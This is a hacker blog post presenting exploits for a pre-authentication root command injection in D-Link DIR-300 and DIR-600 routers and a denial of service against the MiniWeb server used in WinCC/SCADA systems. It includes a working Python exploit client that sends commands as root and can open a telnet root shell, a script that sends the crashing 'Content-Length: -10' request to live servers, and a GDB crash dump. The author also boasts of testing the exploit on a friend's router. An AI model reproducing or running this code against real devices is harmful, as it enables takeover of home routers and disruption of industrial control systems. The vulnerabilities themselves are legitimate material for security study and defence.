Back… With exploits!

So, finally my DNS issues and suchlike got sorted out, and the server has been migrated to a new host. Email is back as of a few hours ago (a few issues with MX records and mailboxes or something, and emails being delivered 10 times to me, but I think that will fix itself after a few days. I hope so anyway, because being bombed with 100 messages 10 times each is getting plenty bloody annoying).

Everything is upgraded to the new WordPress; no more nasty hacking of the config files to get WP to work on a server not designed to run it.

So, while the site was "inactive", I was working on a whole bunch of new content (and finishing old articles) to publish. Seeing as I have exams, I shall just leave a few gifts here for you to look at until they are over. dietrich may have something for you also :)

So, in order to keep everyone entertained for the next few days, check out the following piece of exploit engineering.

D-Link DIR-300 and DIR-600 routers have a hilarious pre-auth remote root flaw in their web interface: a page called "command.php" accepts a "cmd" parameter and executes its value as root, with no authentication whatsoever. EPIC FAIL. Why was that there? Ask D-Link.

It was discovered by a German researcher, @s3cur1ty_de, and you can read his original advisory here: http://www.s3cur1ty.de/m1adv2013-003

I had some free time in college, so I knocked up a quick PoC tool to exploit the flaw, and even managed to test the exploit on a friend's router after class.

PoC Code: http://pastebin.com/raw.php?i=yPDKP86n

Remote Root

It delivers my customary user-friendly shell interface, exploiting the command injection. It can also auto-enable Telnet and grant Telnet access, though this is seemingly less reliable; it hung when I tried it after rebooting the router.
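To make the exchange concrete, here is an added example of the kind of client the tool above implements. This is not the pastebin PoC and not D-Link's code; it assumes only what the advisory describes: an unauthenticated POST to /command.php with a "cmd" form parameter, whose value is executed as root and whose output comes back in the response body. The mock router is constructed so the script runs offline; the telnetd invocation in enable_telnet() is an assumption about the BusyBox build on these devices.

```python
"""PoC client for the D-Link DIR-300/DIR-600 command.php injection.

Added example, not the author's pastebin tool or D-Link firmware code.
Assumes POST /command.php with form parameter "cmd", run as root,
output returned in the response body. The mock router below is a
constructed stand-in so the script runs offline; point exploit() at
a real host (ip or ip:port) to use it against a device you own.
"""
import http.server
import threading
import urllib.parse
import urllib.request

# Constructed canned output the mock hands back; a real device runs the
# command and returns its actual stdout.
MOCK_RESPONSES = {
    "id": "uid=0(root) gid=0(root)\n",
    "cat /var/passwd": "root:x:0:0:root:/root:/bin/sh\n",
}


def build_request(host, cmd):
    """The request that triggers the flaw: an unauthenticated POST of
    cmd=<command> to /command.php. No cookie, no credentials."""
    body = urllib.parse.urlencode({"cmd": cmd}).encode()
    return urllib.request.Request(
        f"http://{host}/command.php",
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )


def exploit(host, cmd, timeout=5):
    """Send one command and return the router's output as text."""
    with urllib.request.urlopen(build_request(host, cmd), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def enable_telnet(host, port=23):
    """Start telnetd bound to a root shell. The exact telnetd flags are an
    assumption about the BusyBox build on these routers (-l login program,
    -p port); adjust if the device returns an error."""
    return exploit(host, f"telnetd -p {port} -l /bin/sh")


class MockRouter(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for the vulnerable firmware: no auth check,
    takes cmd from the POST body and answers with canned output."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        params = urllib.parse.parse_qs(self.rfile.read(length).decode())
        cmd = params.get("cmd", [""])[0]
        if self.path != "/command.php":
            self.send_error(404)
            return
        out = MOCK_RESPONSES.get(cmd, f"sh: {cmd}: not found\n").encode()
        self.send_response(200)
        self.send_header("Content-Length", str(len(out)))
        self.end_headers()
        self.wfile.write(out)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock_router():
    """Bind the mock on a free localhost port; returns "127.0.0.1:PORT"."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), MockRouter)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"127.0.0.1:{srv.server_port}"


def demo():
    """Full round trip against the mock: should come back as root."""
    return exploit(start_mock_router(), "id")


if __name__ == "__main__":
    target = start_mock_router()
    print(exploit(target, "id"), end="")
    print(exploit(target, "cat /var/passwd"), end="")
```

Against a real device, replace start_mock_router() with the router's address; a quick reliability check before trying the Telnet route is to confirm that exploit(host, "id") returns a uid 0 line, since anything else means the endpoint is not the one the advisory describes.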

I will be writing some more exploits, and maybe publishing them soon, so stay tuned ;)

MiniWeb DoS PoC Exploit

So, quite a while ago, I was fuzzing the MiniWeb server available from Google Code (Miniweb) after I realized that WinCC/SCADA systems also seem to use this web server. (Does this put Siemens in violation of the GPL?)

I had been using one of Metasploit's fuzzers and noticed an instant crash it was causing, so I started trying to replicate it.

After enlisting the help of ohdae from BindShell Labs, we were able to figure out that the crash was caused by the "Content-Length: -10" header in the malicious HTTP request; basically, it chokes on that and dies. I had been convinced it was something to do with malicious POST data, but thanks to ohdae, that was quickly corrected.

After a lot more debugging and playing about, I learned that someone else had gotten to this bug first, and it was not a 0day after all. I also had just about given up on getting remote code execution from this vulnerability.

The original advisory can be found here: http://aluigi.altervista.org/adv/winccflex_1-adv.txt

Anyway, on to the fun stuff. So, here is what GDB looks like when the exploit is run…

root@bt:~/fuzzme/SCADA# gdb
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
(gdb) exec-file SCADA
(gdb) run
Starting program: /root/fuzzme/SCADA/SCADA
MiniWeb 0.8.180 (C)2005-09 Stanley Huang (C)2010 Stanley Huang / Felix Wang

Listening port: 80
Web root: webroot
Max clients: 32
URL handlers: 1
Dir listing: on
[6] connection accepted @ May 31 16:15:34
[6] IP: 127.0.0.1
Connected clients: 1

Program received signal SIGSEGV, Segmentation fault.
0x0804c76b in ?? ()
(gdb) info registers
eax            0x0    0
ecx            0x1    1
edx            0xfffffff6    -10
ebx            0x8052718    134555416
esp            0xbffff2c0    0xbffff2c0
ebp            0xbffff318    0xbffff318
esi            0x0    0
edi            0x804f3fa    134542330
eip            0x804c76b    0x804c76b
eflags         0x10246    [ PF ZF IF RF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)
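Note edx in that dump: 0xfffffff6 is exactly -10 as a 32-bit two's-complement value, so the negative Content-Length was still live in a register at the moment of the fault. The following is an added example, not MiniWeb's source or the pastebin PoC: it builds the minimal request carrying the one header that matters, shows the naive signed parse beside a strict one, and can fire the request at a live server. The "naive" parser is an assumption about the bug class (accepting a signed value and later treating it as a size), not a reading of MiniWeb's code; the 64 KiB cap and the request bytes are constructed for the demo.

```python
"""Why "Content-Length: -10" is dangerous, and what a safe parser does.

Added example, not MiniWeb code or the original PoC. The vulnerable
pattern is an assumption about the bug class; the register value is
taken from the gdb dump above (edx = 0xfffffff6).
"""
import re
import socket

MAX_BODY = 64 * 1024  # constructed cap a real server would enforce


def to_u32(n):
    """Value a 32-bit register holds for signed n (edx in the gdb dump)."""
    return n & 0xFFFFFFFF


def naive_content_length(value):
    """Vulnerable pattern: atoi-style, accepts any int. -10 survives as a
    negative length and turns into ~4 GiB if later passed as size_t."""
    return int(value)


def strict_content_length(value, max_body=MAX_BODY):
    """RFC 7230: Content-Length is 1*DIGIT. Reject sign, whitespace and
    anything above the cap; return the int or raise ValueError."""
    if not re.fullmatch(r"[0-9]{1,10}", value):
        raise ValueError(f"malformed Content-Length: {value!r}")
    n = int(value)
    if n > max_body:
        raise ValueError(f"Content-Length {n} exceeds cap {max_body}")
    return n


def build_dos_request(host="127.0.0.1"):
    """The trigger: a POST whose Content-Length is -10. The exact bytes the
    Metasploit fuzzer sent are not on the page; this is a minimal request
    carrying the one header the crash was traced to."""
    return (
        b"POST / HTTP/1.1\r\n"
        b"Host: " + host.encode() + b"\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"Content-Length: -10\r\n"
        b"Connection: close\r\n\r\n"
        b"a=b"
    )


def check_request(raw):
    """Run the strict parser over a raw request: returns the body length it
    would accept, 0 if there is no Content-Length, or the rejection reason."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n")[1:]:
        name, _, val = line.partition(b":")
        if name.strip().lower() == b"content-length":
            try:
                return strict_content_length(val.strip().decode("ascii"))
            except ValueError as e:
                return str(e)
    return 0


def send_dos(host, port=80, timeout=3):
    """Fire the request at a live MiniWeb. True means the server dropped
    the connection without replying, consistent with the SIGSEGV above."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_dos_request(host))
        try:
            return s.recv(1024) == b""
        except (socket.timeout, ConnectionResetError):
            return True


if __name__ == "__main__":
    print(hex(to_u32(naive_content_length("-10"))))   # matches edx
    print(check_request(build_dos_request()))          # strict parser rejects it
```

The practical check for any server you are reviewing is the middle function: a Content-Length must be digits only, bounded, and parsed before any buffer is sized from it. A signed parse that is later compared as unsigned, or handed to a memcpy, is precisely how a harmless-looking "-10" becomes a 4 GiB read.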

And here is a screenshot of my exploit killing the server…
MiniWeb WinCC Denial of Service

Finally, to wrap things up, the PoC Exploit: http://pastebin.com/9EW96xGY

~Infodox